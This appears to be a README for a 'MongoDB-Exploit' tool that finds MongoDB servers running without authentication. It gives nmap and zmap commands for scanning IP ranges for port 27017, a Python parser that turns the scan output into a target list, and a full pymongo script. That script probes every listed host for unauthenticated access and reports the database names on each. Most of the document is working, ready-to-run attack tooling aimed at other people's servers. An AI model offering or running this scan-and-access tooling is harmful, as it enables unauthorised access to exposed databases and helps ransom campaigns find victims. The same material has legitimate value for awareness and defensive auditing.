MongoDB-Exploit

Some MongoDB clusters have no authentication and can therefore be accessed without credentials


MongoDB Exploit

By default, MongoDB does not enforce authentication: a mongod with access control disabled accepts any client that can reach its port. Many inexperienced operators never enable it, and some also widen the default localhost-only bind address (the default since MongoDB 3.6) so the instance is reachable from the Internet, which leaves those servers exposed to bad actors. In the example below, we highlight how easy it is to discover and access such Mongo databases using openly available software:

  • nmap or zmap for open port discovery
  • Python via pymongo for access

Open Ports Discovery

Considering that:

  1. The default MongoDB port (27017) is well known, so anyone can scan for it to identify hosts running a Mongo instance.

  2. Discovering open Mongo ports can be achieved with at least three openly available tools: shodan, nmap or zmap. Since shodan offers only limited free access, we used nmap and zmap for the purpose of this report.

All an attacker needs to do in order to discover open MongoDB ports is to use one of the following options:

nmap

The nmap command used to discover open 27017 ports is:

nmap <IP_RANGE> -p 27017 -Pn > nmap.txt

This command probes port 27017 on every host in the specified range (e.g. X.X.0.0/16), skipping host discovery (-Pn), and writes the result to the nmap.txt file. Note that with -Pn every host is printed as "Host is up", so only the port STATE column tells you anything. The output structure is:

Nmap scan report for <IP_ADDRESS>
Host is up.

PORT      STATE  SERVICE
27017/tcp open mongod

To perform the attack, one has to manually copy each <IP_ADDRESS> whose port is reported open into a new file, one address per line and nothing else.
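The manual copy step above is error-prone on a /16, so here is an added helper (example code written for this page, not part of the check_mongo.py tool) that parses nmap's normal output into the one-IP-per-line list the next step expects. The sample output embedded in it is constructed for illustration; the regexes assume the "Nmap scan report for ..." / "27017/tcp open mongod" layout shown above. (nmap's own `--open -oG -` output is an alternative if you prefer grep.)

```python
import ipaddress
import re
import sys
from typing import List

# Constructed sample in the layout of nmap's normal output shown above (not a real
# scan). With -Pn every host is reported as up, so only the port STATE matters.
SAMPLE_NMAP_OUTPUT = """\
Nmap scan report for 192.0.2.10
Host is up.

PORT      STATE    SERVICE
27017/tcp open     mongod

Nmap scan report for 192.0.2.11
Host is up.

PORT      STATE    SERVICE
27017/tcp filtered mongod

Nmap scan report for db.example.test (198.51.100.5)
Host is up.

PORT      STATE  SERVICE
27017/tcp open   mongod
"""

# "Nmap scan report for 1.2.3.4" or "Nmap scan report for name (1.2.3.4)"
REPORT_RE = re.compile(r"^Nmap scan report for (?:\S+ \()?(\d{1,3}(?:\.\d{1,3}){3})\)?")
# "27017/tcp open mongod" -> port number and state
PORT_RE = re.compile(r"^(\d+)/tcp\s+(\S+)")


def extract_open_hosts(nmap_text: str, port: int = 27017) -> List[str]:
    """Return the IPs (in scan order, deduplicated) on which `port` is reported open."""
    hosts: List[str] = []
    seen = set()
    current = None
    for line in nmap_text.splitlines():
        m = REPORT_RE.match(line)
        if m:
            current = m.group(1)
            try:
                ipaddress.ip_address(current)  # drop anything that is not a valid address
            except ValueError:
                current = None
            continue
        m = PORT_RE.match(line)
        if m and current and int(m.group(1)) == port and m.group(2) == "open":
            if current not in seen:
                seen.add(current)
                hosts.append(current)
    return hosts


def write_ip_list(hosts: List[str], path: str) -> int:
    """Write one IP per line (the same layout as zmap's -o file); returns the count."""
    with open(path, "w") as fh:
        for ip in hosts:
            fh.write(ip + "\n")
    return len(hosts)


if __name__ == "__main__":
    # Usage: python3 nmap_to_ips.py nmap.txt   (falls back to the constructed sample)
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_NMAP_OUTPUT
    found = extract_open_hosts(text)
    print("\n".join(found))
    write_ip_list(found, "ips.txt")
```

Hosts whose port comes back "filtered" or "closed" are dropped, so the resulting ips.txt only carries hosts worth probing in the next step.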

zmap

The zmap command used to discover open 27017 ports is:

zmap -p 27017 <IP_RANGE> -o ips.txt

zmap sends raw packets and therefore has to be run as root. Its output is a plain list of IP addresses, one per line, which can be used without any modification in our check_mongo.py exploit. Note that zmap only records hosts that answered the SYN on 27017; whether a mongod is actually listening there, and whether it requires authentication, is determined in the next step.

Exploiting Open Mongo Server

Not all servers discovered with nmap or zmap are vulnerable to this attack. Some do have authentication set up and hence cannot be accessed. Our goal is to single out the servers that require no authentication. We can do so by:

  1. Manually trying to access these servers via MongoDB Compass.
  2. Using the check_mongo.py exploit

Checking access via exploit

Run the following command in your terminal:

python3 check_mongo.py 

The exploit probes every listed server for unauthenticated access and prints the results in real time. When finished it also generates a report.txt file containing the IP addresses of the vulnerable servers together with the names of the databases it managed to list on each of them.

  1. Exploit running (screenshot)

  2. Report file output (a database with a name like READ_ME_TO_RECOVER_YOUR_DATA means the server has already been hit by one of the well-known ransom campaigns that wipe open Mongo instances and leave a note behind):

[+] <IP_ADDRESS> - ['READ_ME_TO_RECOVER_YOUR_DATA', 'admin', 'config']
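For readers who want to see what the check actually does on the wire, here is an added example (written for this page; it is not the repository's check_mongo.py) of the pymongo probe behind the report format above. It assumes pymongo is installed, reads the ips.txt produced by zmap (or by hand), and writes report.txt. The distinction it draws is the one that matters: a server answering listDatabases with code 13 (Unauthorized) has authentication enabled and is not vulnerable, while a server that returns its database names is. The ransom-note markers and the status names are this example's own choices.

```python
import sys
from typing import Dict, Iterable, List, Optional

# Substrings typical of the databases left by ransom/wipe campaigns against open
# MongoDB servers (assumption: the one in the report above is one such name).
RANSOM_NOTE_MARKERS = ("READ_ME", "RECOVER")


def load_targets(path: str) -> List[str]:
    """One IP per line (zmap's ips.txt layout); blank lines and # comments are ignored."""
    with open(path) as fh:
        return [ln.strip() for ln in fh if ln.strip() and not ln.startswith("#")]


def check_host(ip: str, port: int = 27017, timeout_ms: int = 3000) -> Dict[str, object]:
    """Try to list databases without credentials and classify the outcome."""
    # Imported here so the pure helpers below can be used without pymongo installed.
    from pymongo import MongoClient
    from pymongo.errors import OperationFailure, PyMongoError

    client = MongoClient(host=ip, port=port,
                         serverSelectionTimeoutMS=timeout_ms,
                         connectTimeoutMS=timeout_ms,
                         socketTimeoutMS=timeout_ms,
                         directConnection=True)
    try:
        names = client.list_database_names()          # runs listDatabases on admin
        return {"ip": ip, "status": "open", "databases": names}
    except OperationFailure as exc:
        # Code 13 = Unauthorized: reachable mongod, but access control is enforced.
        status = "auth_required" if exc.code == 13 else "error"
        return {"ip": ip, "status": status, "error": str(exc)}
    except PyMongoError as exc:
        # Timeouts, refused connections, non-Mongo services answering on 27017.
        return {"ip": ip, "status": "unreachable", "error": str(exc)}
    finally:
        client.close()


def looks_ransomed(databases: Iterable[str]) -> bool:
    """True if any database name carries one of the ransom-note markers."""
    return any(marker in name.upper() for name in databases for marker in RANSOM_NOTE_MARKERS)


def report_line(result: Dict[str, object]) -> Optional[str]:
    """Render the report.txt line "[+] <ip> - [databases]"; None for non-vulnerable hosts."""
    if result["status"] != "open":
        return None
    tag = " (ransom note present)" if looks_ransomed(result["databases"]) else ""
    return f"[+] {result['ip']} - {list(result['databases'])!r}{tag}"


def main(argv: List[str]) -> int:
    targets = load_targets(argv[1] if len(argv) > 1 else "ips.txt")
    with open("report.txt", "w") as report:
        for ip in targets:
            result = check_host(ip)
            line = report_line(result)
            if line:
                print(line, flush=True)
                report.write(line + "\n")
            else:
                print(f"[-] {ip} - {result['status']}", flush=True)
    return 0


if __name__ == "__main__":
    sys.exit(main(sys.argv))
```

The short serverSelectionTimeoutMS keeps the run from hanging on hosts where zmap saw a SYN-ACK but nothing speaks the Mongo wire protocol; without it pymongo waits 30 seconds per dead host.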